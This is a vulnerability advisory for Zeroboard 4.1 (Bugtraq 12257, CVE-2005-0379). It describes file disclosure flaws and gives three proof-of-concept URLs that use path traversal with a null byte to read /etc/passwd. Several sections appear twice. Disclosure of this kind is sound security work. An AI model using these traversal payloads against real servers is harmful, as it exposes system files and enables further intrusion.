Zeroboard Multiple File Disclosure Vulnerabilities
BID:12257
Info
Zeroboard Multiple File Disclosure Vulnerabilities
| Bugtraq ID: | 12257 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0379 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 13 2005 12:00AM |
| Updated: | Jul 12 2009 09:27AM |
| Credit: | Discovery of this vulnerability is credited to Jeremy Bae at STG Security. |
| Vulnerable: |
Zeroboard Zeroboard 4.1 pl5 Zeroboard Zeroboard 4.1 pl4 Zeroboard Zeroboard 4.1 pl3 Zeroboard Zeroboard 4.1 pl2 |
| Not Vulnerable: | |
Discussion
Zeroboard Multiple File Disclosure Vulnerabilities
Zeroboard is reportedly affected by multiple file disclosure vulnerabilities. These issues are due to the application failing to properly sanitize user-supplied input to certain parameters. These issues could be exploited to retrieve sensitive information such as /etc/passwd. That information could then be used to enhance further attacks onto the underlying system.
Zeroboard is reportedly affected by multiple file disclosure vulnerabilities. These issues are due to the application failing to properly sanitize user-supplied input to certain parameters. These issues could be exploited to retrieve sensitive information such as /etc/passwd. That information could then be used to enhance further attacks onto the underlying system.
Exploit / POC
Zeroboard Multiple File Disclosure Vulnerabilities
No exploit is required and the following proof of concepts are available:
http://www.example.com/_head.php?_zb_path=../../../../../etc/passwd%00
http://www.example.com/include/write.php?dir=../../../../../etc/passwd%00
http://www.example.com/outlogin.php?_zb_path=../../../../../etc/passwd%00
No exploit is required and the following proof of concepts are available:
http://www.example.com/_head.php?_zb_path=../../../../../etc/passwd%00
http://www.example.com/include/write.php?dir=../../../../../etc/passwd%00
http://www.example.com/outlogin.php?_zb_path=../../../../../etc/passwd%00
Solution / Fix
Zeroboard Multiple File Disclosure Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Zeroboard Multiple File Disclosure Vulnerabilities
References:
References: